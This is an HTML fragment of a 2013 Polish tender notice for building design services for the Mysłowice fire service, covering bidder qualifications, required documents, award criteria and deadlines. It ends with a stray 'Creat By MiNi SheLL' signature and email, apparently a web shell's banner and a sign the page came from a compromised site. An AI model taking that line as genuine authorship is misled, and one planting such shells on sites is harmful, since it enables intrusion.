<ul class="kh_indent_1"><li><p>wykazanie, że wykonawca wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie usługi, tj. każda w zakresie projektowania architektonicznego obiektu kubaturowego o pow. co najmniej 3000 m2 powierzchni użytkowej i uzyskały decyzję pozwolenia na budowę, każda o wartości (netto) nie mniejszej niż 150 000 PLN (słownie: sto pięćdziesiąt tysięcy złotych 00/100), w przypadku wykazania wartości w walucie obcej, dla oceny spełniania ww. warunku udziału w postępowaniu Zamawiający przyjmie iloczyn wykazanej wartości i średniego kursu tej waluty, określonego przez Narodowy Bank Polski w dniu wszczęcia postępowania o udzielenie niniejszego zamówienia, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, dla oceny spełniania w/w warunku udziału w postępowaniu sumowaniu podlega wiedza i doświadczenie w/w wykonawców.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca wykazuje spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazanie, że wykonawca dysponuje lub będzie dysponował osobą/osobami posiadającą/ymi uprawnienia budowlane do projektowania w specjalności:
a.	architektonicznej bez ograniczeń*  (pełniącą funkcję koordynatora projektu);
b.	konstrukcyjno-budowlanej bez ograniczeń* (pełniącą funkcję projektanta); 
c.	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń* (pełniącą funkcję projektanta); 
d.	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 
i elektroenergetycznych bez ograniczeń*  (pełniącą funkcję projektanta); 
 * (zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane - tekst jednolity: Dz. U. 
z 2010 r. Nr 243, poz. 1623 z późn. zm.)
lub posiadającą/ymi odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które upoważniają do pełnienia tej/tych funkcji, a także bedącą/ymi członkiem/ami właściwej izby samorządu zawodowego 
albo wykazanie, że wykonawca dysponuje lub będzie dysponował osobą/osobami posiadającą/ymi/ odpowiadające ww. uprawnieniom kwalifikacje zawodowe, które zostały uznane na zasadach określonych w przepisach odrębnych, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, dla oceny spełniania w/w warunku udziału w postępowaniu sumowaniu podlega potencjał osobowy ww. wykonawców.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazanie, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, o wysokości sumy ubezpieczenia nie mniejszej niż 500 000 PLN (słownie: pięćset tysięcy złotych 00/100), w przypadku wykazania sumy ubezpieczenia w walucie obcej, dla oceny spełniania w/w warunku udziału w postępowaniu Zamawiający przyjmie, iż sumą ubezpieczenia jest iloczyn wykazanej sumy ubezpieczenia i średniego kursu tej waluty, określonego przez Narodowy Bank Polski w dniu wszczęcia postępowania o udzielenie niniejszego zamówienia, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, dla oceny spełniania ww. warunku udziału w postępowaniu sumowaniu podlega potencjał ekonomiczny i finansowy w/w wykonawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo do reprezentowania wykonawcy, o ile ofertę składa pełnomocnik.                                              
2. Pełnomocnictwo wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z którym ustanawiają pełnomocnika do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania 
w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.                                                                          
3. Wykonawca, o którym mowa w art. 26 ust. 2b zd. 1 uPzp, zobowiazany jest do udowodnienia Zamawiającemu okoliczności wskazanych w tym zdaniu, na zasadach o których mowa w zd. 2 art. 26 ust. 2b (w szczególności pisemne zobowiązanie tych podmiotów - zał. nr 7 do siwz).
4. Jeżeli wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega 
na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający, w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda przedłożenia dokumentów dotyczących w szczególności:
- zakresu dostępnych wykonawcy zasobów innego podmiotu, 
- sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, 
- charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, 
- zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. 
5. Karta ofertowa (zał. nr 8 do siwz).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin wykonania - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie,
w formie aneksu do umowy, pod rygorem nieważności takiej zmiany. 
2.	Zamawiający dopuszcza zmianę, o której mowa w ust. poprzedzającym, w odniesieniu do:
2.1.	części zamówienia realizowanej z udziałem podwykonawcy/ów;
2.2.	osoby/osób wyznaczonej/ych przez Zamawiającego do konsultacji przy wykonywaniu przedmiotu umowy i odbioru przedmiotu umowy;
2.3.	koordynatora projektu, projektanta/ów;
2.4.	wysokości wynagrodzenia w związku ze zmianą przepisów podatkowych.
3.	Zmiana postanowień zawartej umowy w odniesieniu do osoby/osób wyznaczonej/ych przez Zamawiającego do konsultacji przy wykonywaniu przedmiotu umowy i odbioru przedmiotu umowy oraz w odniesieniu do koordynatora projektu, projektanta/ów/ może nastąpić w przypadku:
3.1.	choroby lub innych zdarzeń losowych uniemożliwiających wykonywanie obowiązków wynikających z umowy;
3.2.	nie wywiązywania się z obowiązków wynikających z umowy;
3.3.	rezygnacji z wykonywania obowiązków wynikających z umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> myslowice.kmpsp.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Miejska Państwowej Straży Pożarnej w Mysłowicach, ul. Strażacka 7 - Sekretariat Komendanta Miejskiego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.12.2013 godzina 13:00, miejsce: Komenda Miejska Państwowej Straży Pożarnej w Mysłowicach, ul. Strażacka 7 - Sekretariat Komendanta Miejskiego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com